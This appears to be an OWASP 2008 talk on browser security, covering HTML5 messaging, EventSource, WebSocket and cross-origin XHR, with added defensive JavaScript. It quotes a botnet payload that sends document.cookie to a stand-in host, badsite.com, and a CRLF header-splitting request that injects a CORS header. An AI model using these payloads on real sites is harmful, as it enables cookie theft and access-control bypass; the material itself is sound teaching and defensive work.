
Browser Security

Roberto Suggi Liverani, Pentester/Researcher
OWASP – Browser Security. Roberto Suggi Liverani, Security Consultant, Security-Assessment.com, 3 September 2008
Who am I?
Agenda
Introduction
Next Challenges
HTML5 – document.domain
Diagram: y.hello.com and x.hello.com both set document.domain = hello.com; an XSS injection in one subdomain then gives the injected script access to the other (communication between two subdomains through XSS). Relaxing document.domain widens the origin to every subdomain that opts in, so a single XSS reaches all of them.
HTML5 – document.open
Diagram: (a) injection in 1.COM (vulnerable) of a document.open call pointing to 3.COM (malicious third party); (b) iframe injection with src=2.COM; result: cross context scripting between 2.COM and 3.COM.
HTML5 – custom content type redirection
Diagram: A.COM and B.COM; test.foo served as text/foo triggers a redirection to http://a.com/foo?url=b.com/test.foo
HTML5 – postMessage
Diagram: A.COM embeds B.COM in an iframe and sends it a message:
    var o = document.getElementsByTagName('iframe')[0];
    o.contentWindow.postMessage('Hello world', 'http://b.com/');
NOTE: the second argument (the target origin) can be omitted or set to *. With * the message is delivered to whatever origin the frame currently holds, so a frame that has since been navigated elsewhere receives it; on the receiving side, a listener that does not check event.origin acts on messages from any page that can frame or open it.
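The receiving side of the exchange above, as an added example that is not part of the original slides. It shows the checks b.com's page must do itself (origin allowlist, payload parsed as data, action allowlist) and a sender that refuses the * wildcard. The trusted origins, the message shape ({action, height}) and the plain event objects used in place of DOM MessageEvents are assumptions made for illustration.

```javascript
// Added example, not from the original slides: the receiving side of the
// postMessage exchange, with the checks b.com's page has to do itself.
// The trusted origins, the message shape ({action, height}) and the plain
// event objects used instead of DOM MessageEvents are assumptions.

const TRUSTED_SENDERS = new Set(['http://a.com', 'https://a.com']);
const ALLOWED_ACTIONS = new Set(['ping', 'resize']);

// Decide whether a received message may be acted on.
// Returns { accepted, reason, command } where command is the parsed payload.
function handleMessage(event) {
  // 1. Origin check. The browser fills in event.origin and a page cannot forge
  //    it, so this is the only trustworthy sender identity. A listener that
  //    skips it executes commands from any site that can frame or open b.com.
  if (!TRUSTED_SENDERS.has(event.origin)) {
    return { accepted: false, reason: 'untrusted origin ' + event.origin };
  }
  // 2. Treat the payload as data: parse it, never eval() it or write it as HTML.
  let command;
  try {
    command = typeof event.data === 'string' ? JSON.parse(event.data) : event.data;
  } catch (e) {
    return { accepted: false, reason: 'payload is not JSON' };
  }
  if (!command || typeof command !== 'object' || Array.isArray(command)) {
    return { accepted: false, reason: 'payload is not an object' };
  }
  // 3. Allowlist the actions, so even a trusted origin that has been XSSed
  //    (the document.domain scenario on the earlier slide) is limited to the
  //    documented API surface.
  if (!ALLOWED_ACTIONS.has(command.action)) {
    return { accepted: false, reason: 'unknown action ' + String(command.action) };
  }
  if (command.action === 'resize' &&
      !(Number.isInteger(command.height) && command.height > 0 && command.height <= 4000)) {
    return { accepted: false, reason: 'bad resize height' };
  }
  return { accepted: true, reason: 'ok', command };
}

// Sending side: refuse the "*" wildcard the slide notes is allowed. With "*",
// if the iframe has meanwhile been navigated to another site, that site gets
// the message; an explicit target origin makes the browser drop it instead.
function sendCommand(targetWindow, targetOrigin, command) {
  if (targetOrigin === '*') {
    throw new Error('refusing to postMessage with targetOrigin "*"');
  }
  targetWindow.postMessage(JSON.stringify(command), targetOrigin);
  return targetOrigin;
}

// Wire-up as it would appear in b.com's page (guarded so the file also loads in Node).
if (typeof window !== 'undefined') {
  window.addEventListener('message', function (ev) {
    var result = handleMessage(ev);
    if (result.accepted && result.command.action === 'resize') {
      document.body.style.height = result.command.height + 'px';
    }
  });
}
```

The origin check is deliberately an exact-string allowlist: matching with a regular expression or with indexOf('a.com') would also accept http://a.com.attacker.example or http://nota.com.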
HTML5 – Server-Sent Events (EventSource)
Diagram: an <eventsource> element pulls an event stream from the server:
    data: http://www.google.com/news/1
    data: http://www.yahoo.com/news/3
    data: http://bbc.co.uk/news/2
HTML5 – Server-Sent Events as a botnet channel
Diagram: bots poll badsite.com/evil.php, which serves a data stream (MIME type text/event-stream) whose payload the infected page evaluates as script:
    data: wait();
    data: wait();
    data: document.write('<img src="http://badsite.com/' + document.cookie + '">');
The botnet operates within the XHR access control (cross-origin) rules for its data exchange.
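A parser for the text/event-stream format shown on the two slides above, followed by a consumer that treats each "data:" payload as data rather than executing it, as an added example that is not part of the original slides. The sample stream is constructed for this example and mixes the news URLs from the first slide with the botnet commands from the second.

```javascript
// Added example, not from the original slides: a text/event-stream parser and
// a consumer that does not execute what arrives in "data:". SAMPLE_STREAM is
// constructed here from the lines shown on the slides.

// Parse a complete event-stream body into dispatched events.
// Field rules: "data:" lines accumulate (joined with "\n"), "event:" sets the
// type, "id:" sets lastEventId, a blank line dispatches, lines starting with
// ":" are comments, and unknown fields are ignored.
function parseEventStream(body) {
  const events = [];
  let data = [];
  let type = 'message';
  let lastEventId = '';
  const dispatch = () => {
    if (data.length === 0) { type = 'message'; return; } // nothing buffered: no event
    events.push({ type, data: data.join('\n'), lastEventId });
    data = [];
    type = 'message';
  };
  for (const rawLine of body.split(/\r\n|\r|\n/)) {
    if (rawLine === '') { dispatch(); continue; }
    if (rawLine.startsWith(':')) continue;
    const colon = rawLine.indexOf(':');
    const field = colon === -1 ? rawLine : rawLine.slice(0, colon);
    let value = colon === -1 ? '' : rawLine.slice(colon + 1);
    if (value.startsWith(' ')) value = value.slice(1); // one leading space is stripped
    switch (field) {
      case 'data': data.push(value); break;
      case 'event': type = value; break;
      case 'id': if (!value.includes('\0')) lastEventId = value; break;
      case 'retry': break; // reconnection delay; not needed offline
      default: break;      // unknown field: ignored
    }
  }
  return events; // a trailing block with no blank line after it is not dispatched
}

// Consumer: the botnet on the slide works only because the client evaluates
// whatever arrives in "data:". This consumer accepts a single allowlisted
// shape (an http/https URL in a plain "message" event) and rejects the rest.
function consumeNewsStream(body) {
  const accepted = [];
  const rejected = [];
  for (const ev of parseEventStream(body)) {
    let url;
    try { url = new URL(ev.data); } catch (e) { rejected.push(ev.data); continue; }
    if ((url.protocol === 'http:' || url.protocol === 'https:') && ev.type === 'message') {
      accepted.push(url.href);   // safe to use as a link target; never eval'd or written as HTML
    } else {
      rejected.push(ev.data);
    }
  }
  return { accepted, rejected };
}

// Constructed sample: the news feed from the first slide plus the commands
// the botnet slide pushes through the same channel.
const SAMPLE_STREAM = [
  ': constructed sample stream',
  'data: http://www.google.com/news/1',
  '',
  'id: 3',
  'data: http://www.yahoo.com/news/3',
  '',
  'data: http://bbc.co.uk/news/2',
  '',
  'data: wait();',
  '',
  "data: document.write('<img src=\"http://badsite.com/' + document.cookie + '\">');",
  '',
].join('\n');
```

Running consumeNewsStream(SAMPLE_STREAM) keeps the three URLs and rejects the two command lines; the parser itself is neutral, the protection is entirely in what the consumer is willing to do with a payload.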
HTML5 – WebSocket (2008 draft handshake)
Client at 123.com sends to the server at aa.com:
    GET ws://aa.com/ HTTP/1.1
    Upgrade: WebSocket
    Connection: Upgrade
    Host: aa.com
    Origin: http://123.com
    Authorization: Basic d2FsbGU6ZXZl
Server at aa.com replies:
    HTTP/1.1 101 Web Socket Protocol Handshake
    Upgrade: WebSocket
    Connection: Upgrade
    WebSocket-Origin: http://123.com
    WebSocket-Location: ws://aa.com:80/
Data framing: both sides send and read raw UTF-8 data byte per byte.
Close: the TCP/IP connection is simply closed, with no closing handshake.
Note that the browser attaches ambient credentials (here Basic auth) and the page's Origin, but nothing forces the server to check Origin; a server that ignores it accepts a socket opened by any site the user visits. This is the draft handshake of the time; RFC 6455 later replaced it with Sec-WebSocket-Key/Sec-WebSocket-Accept, masked framing and a closing handshake, while Origin checking remained the server's job.
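Server-side validation of the handshake above, as an added example that is not part of the original slides: it parses the request head, rejects malformed or duplicated headers, and completes the upgrade only for an allowlisted Origin. Header names follow the 2008 draft on the slide; the allowed origins and the two sample requests are assumptions.

```javascript
// Added example, not from the original slides: the aa.com side of the
// handshake. The browser attaches ambient credentials and the page's Origin
// but applies no cross-origin policy to WebSocket upgrades, so the server
// must check Origin itself. Allowed origins and sample requests are assumptions.

const ALLOWED_WS_ORIGINS = new Set(['http://aa.com', 'https://aa.com']);

// Parse a raw HTTP/1.1 request head into { method, target, version, headers }
// (header names lower-cased), or { error } if it is malformed. A repeated
// header is an error so a second smuggled "Origin:" cannot override the first.
function parseRequestHead(raw) {
  const head = raw.split('\r\n\r\n')[0];
  const lines = head.split('\r\n');
  const m = /^([A-Z]+) (\S+) HTTP\/(\d\.\d)$/.exec(lines[0]);
  if (!m) return { error: 'malformed request line' };
  const headers = new Map();
  for (const line of lines.slice(1)) {
    const i = line.indexOf(':');
    if (i <= 0) return { error: 'malformed header line' };
    const name = line.slice(0, i).trim().toLowerCase();
    if (headers.has(name)) return { error: 'duplicate header ' + name };
    headers.set(name, line.slice(i + 1).trim());
  }
  return { method: m[1], target: m[2], version: m[3], headers };
}

// Decide whether to complete the upgrade. Returns { accept, status, reason }.
function checkHandshake(raw, allowedOrigins) {
  allowedOrigins = allowedOrigins || ALLOWED_WS_ORIGINS;
  const req = parseRequestHead(raw);
  if (req.error) return { accept: false, status: 400, reason: req.error };
  const h = req.headers;
  if (req.method !== 'GET' || req.version !== '1.1') {
    return { accept: false, status: 400, reason: 'upgrade requires GET over HTTP/1.1' };
  }
  if ((h.get('upgrade') || '').toLowerCase() !== 'websocket') {
    return { accept: false, status: 400, reason: 'missing Upgrade: WebSocket' };
  }
  const conn = (h.get('connection') || '').toLowerCase().split(',').map(s => s.trim());
  if (conn.indexOf('upgrade') === -1) {
    return { accept: false, status: 400, reason: 'missing Connection: Upgrade' };
  }
  if (!h.has('host')) return { accept: false, status: 400, reason: 'missing Host' };
  // The Origin check is the whole cross-site defence: a page cannot change the
  // Origin the browser sends, but nothing forces the server to look at it.
  const origin = h.get('origin');
  if (!origin) return { accept: false, status: 403, reason: 'missing Origin' };
  if (!allowedOrigins.has(origin.toLowerCase())) {
    return { accept: false, status: 403, reason: 'origin not allowed: ' + origin };
  }
  return { accept: true, status: 101, reason: 'ok' };
}

// Build the 101 response in the draft format on the slide for an accepted request.
function buildAcceptResponse(raw) {
  const req = parseRequestHead(raw);
  const path = req.target.replace(/^ws:\/\/[^/]+/, ''); // the slide uses an absolute ws:// target
  return [
    'HTTP/1.1 101 Web Socket Protocol Handshake',
    'Upgrade: WebSocket',
    'Connection: Upgrade',
    'WebSocket-Origin: ' + req.headers.get('origin'),  // echoes the client's Origin
    'WebSocket-Location: ws://' + req.headers.get('host') + path,
    '', '',
  ].join('\r\n');
}

// Constructed handshakes: the slide's cross-site case (a page on 123.com opening
// a socket to aa.com with the user's Basic credentials riding along) and a
// same-site one.
const CROSS_SITE_REQUEST = [
  'GET ws://aa.com/ HTTP/1.1',
  'Upgrade: WebSocket',
  'Connection: Upgrade',
  'Host: aa.com',
  'Origin: http://123.com',
  'Authorization: Basic d2FsbGU6ZXZl',
  '', '',
].join('\r\n');
const SAME_SITE_REQUEST = CROSS_SITE_REQUEST.replace('Origin: http://123.com', 'Origin: http://aa.com');
```

With the default allowlist, checkHandshake(CROSS_SITE_REQUEST) returns status 403 even though the request carries valid credentials, which is exactly the case an Origin-blind server gets wrong.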
WebApps (XHR) – cross-site XMLHttpRequest (access control)
Resource: aaa.com/test.txt; client: bbb.com
JavaScript + XHR on bbb.com (GET shown; POST works the same way):
    var client = new XMLHttpRequest();
    client.open("GET", "http://aaa.com/test.txt");
    client.onreadystatechange = function() { /* do something */ };
    client.send();
HTTP response from aaa.com:
    Access-Control-Allow-Origin: http://bbb.com

    Hello World!
NOTE: the entire access control system relies on HTTP headers. So what happens with an HTTP splitting attack? If aaa.com reflects part of the URL into a response header without stripping CR/LF, the requesting site can inject the header it needs:
    var client = new XMLHttpRequest();
    client.open("GET", "http://aaa.com/test.txt%0d%0aAccess-Control-Allow-Origin: http://bbb.com%0d%0a%0d%0a");
    client.onreadystatechange = function() { /* do something */ };
    client.send();
The browser checks only the headers it receives, so an injected Access-Control-Allow-Origin is honoured exactly like a legitimate one.
WebApps (XHR) – preflight
Resource: aaa.com/test.txt; client: bbb.com
Preflight request (OPTIONS). The browser issues this itself before a non-simple request such as DELETE; the script below only makes it explicit:
    var client = new XMLHttpRequest();
    client.open("OPTIONS", "http://aaa.com/test.txt");
    client.onreadystatechange = function() { /* do something */ };
    client.send();
HTTP response to the preflight:
    Access-Control-Allow-Origin: http://bbb.com
    Access-Control-Max-Age: 3628800
Only then is the actual request sent (and, thanks to Max-Age, not preflighted again for 3628800 seconds):
    var client = new XMLHttpRequest();
    client.open("DELETE", "http://aaa.com/test.txt");
    client.onreadystatechange = function() { /* do something */ };
    client.send();
A current browser additionally requires the preflight response to list DELETE in Access-Control-Allow-Methods before it sends the DELETE.
NOTE: the entire access control system relies on HTTP headers.
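The aaa.com side of the two exchanges above (the simple GET and the DELETE behind a preflight), as an added example that is not part of the original slides. It emits the access-control headers only from an allowlist, handles the preflight, and includes a serializer that reproduces, and then closes, the HTTP splitting case from the previous slide. The policy values, the reflect-any-origin misconfiguration and the sample requests are assumptions; only the Max-Age value 3628800 is taken from the slide.

```javascript
// Added example, not from the original slides: a CORS decision function for
// aaa.com plus the wire serializer that shows why header values must never
// carry CR/LF. Policy values and sample requests are assumptions.

const CORS_POLICY = {
  allowedOrigins: new Set(['http://bbb.com']),
  allowedMethods: new Set(['GET', 'POST', 'DELETE']),
  allowedHeaders: new Set(['content-type', 'x-requested-with']),
  maxAgeSeconds: 3628800,   // value shown on the slide
  allowCredentials: true,
};

// Common misconfiguration, kept for comparison: reflect whatever Origin arrives.
const REFLECT_ANY_ORIGIN = Object.assign({}, CORS_POLICY, {
  allowedOrigins: { has: function () { return true; } },
});

// request: { method, origin, acrMethod, acrHeaders } (acr* = Access-Control-Request-*).
// Returns { status, headers, body }; headers is a plain name -> value object.
function corsResponse(request, policy, resourceBody) {
  policy = policy || CORS_POLICY;
  resourceBody = resourceBody === undefined ? 'Hello World!' : resourceBody;
  const headers = { 'Vary': 'Origin' }; // caches must key on Origin, or bbb.com's copy is served to others
  const isPreflight = request.method === 'OPTIONS' && request.acrMethod !== undefined;
  const origin = request.origin;

  if (origin === undefined) {           // same-origin or non-browser client: no CORS headers
    return { status: 200, headers, body: resourceBody };
  }
  if (!policy.allowedOrigins.has(origin)) {
    // Unknown origin: never echo it. Without Access-Control-Allow-Origin the
    // browser refuses to expose the body, and a failed preflight blocks the DELETE.
    return { status: isPreflight ? 403 : 200, headers, body: isPreflight ? '' : resourceBody };
  }
  // Echo the exact allowlisted origin; "*" must never be combined with credentials.
  headers['Access-Control-Allow-Origin'] = origin;
  if (policy.allowCredentials) headers['Access-Control-Allow-Credentials'] = 'true';

  if (isPreflight) {
    if (!policy.allowedMethods.has(request.acrMethod.toUpperCase())) {
      return { status: 403, headers, body: '' };
    }
    const asked = (request.acrHeaders || '').split(',').map(h => h.trim().toLowerCase()).filter(Boolean);
    if (asked.some(h => !policy.allowedHeaders.has(h))) {
      return { status: 403, headers, body: '' };
    }
    // The browser sends the DELETE only if it is listed in Allow-Methods;
    // Max-Age lets it skip the preflight for later requests.
    headers['Access-Control-Allow-Methods'] = Array.from(policy.allowedMethods).join(', ');
    headers['Access-Control-Allow-Headers'] = Array.from(policy.allowedHeaders).join(', ');
    headers['Access-Control-Max-Age'] = String(policy.maxAgeSeconds);
    return { status: 204, headers, body: '' };
  }
  if (!policy.allowedMethods.has(request.method)) {
    return { status: 405, headers, body: '' };
  }
  return { status: 200, headers, body: resourceBody };
}

// Strip CR and LF from anything that ends up in a header value.
function sanitizeHeaderValue(v) {
  return String(v).replace(/[\r\n]/g, '');
}

// Serialize to wire format. With sanitize=false this reproduces the splitting
// bug on the slide: a CR/LF inside a reflected value starts a new header line,
// so a client-chosen Access-Control-Allow-Origin reaches the browser intact.
function serializeResponse(resp, sanitize) {
  sanitize = sanitize !== false;
  const lines = ['HTTP/1.1 ' + resp.status];
  for (const name of Object.keys(resp.headers)) {
    const value = resp.headers[name];
    lines.push(name + ': ' + (sanitize ? sanitizeHeaderValue(value) : value));
  }
  return lines.join('\r\n') + '\r\n\r\n' + resp.body;
}
```

The allowlisted policy never puts an attacker-controlled string into a header, so the sanitizer is a second line of defence there; under REFLECT_ANY_ORIGIN it is the only thing standing between a CR/LF in the Origin header and an injected Access-Control-Allow-Origin on the wire.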
XHR alternative – XDR (XDomainRequest, IE8)
Resource: aaa.com/xdr.txt; client: bbb.com
JavaScript + XDR on bbb.com:
    var xdr = new XDomainRequest();
    xdr.open("GET", "http://www.aaa.com/xdr.txt");
    xdr.onload = function() { /* xdr.responseText holds the reply */ };
    xdr.send();
HTTP request (GET):
    GET /xdr.txt HTTP/1.1
    XDomainRequest: 1
    Host: www.aaa.com
HTTP response:
    XDomainRequestAllowed: 1

    Hello!
NOTE: the entire XDR mechanism relies on HTTP headers. XDomainRequest never sends cookies or HTTP authentication and supports only GET and POST; the header names shown are those of the IE8 beta, and later IE8 builds switched to Access-Control-Allow-Origin.
Browser Plugins
Browser Plugins – Flash FileReference.download (ActionScript 3):
    import flash.events.MouseEvent;
    import flash.net.FileReference;
    import flash.net.URLRequest;

    // "test" is a clickable display object on the stage; a click starts the download
    test.addEventListener(MouseEvent.CLICK, downloadFile);
    var fileRef:FileReference = new FileReference();
    function downloadFile(event:MouseEvent):void {
        // opens the Flash Player save dialog; download() must be called from a user event
        fileRef.download(new URLRequest("http://www.aaa.com/file.html"), "file.html");
    }
OWASP Intrinsic Group
Questions?

This talk is a generic but comprehensive overview of security mechanisms, controls and potential attacks in modern browsers. It also covers new technologies such as HTML5 and its related APIs, to highlight new attack scenarios against browsers.

Editor's Notes

1. updateready -> the application cache is not the newest version (the applicationCache updateready event fires once a newer cache has been downloaded and is waiting to be swapped in)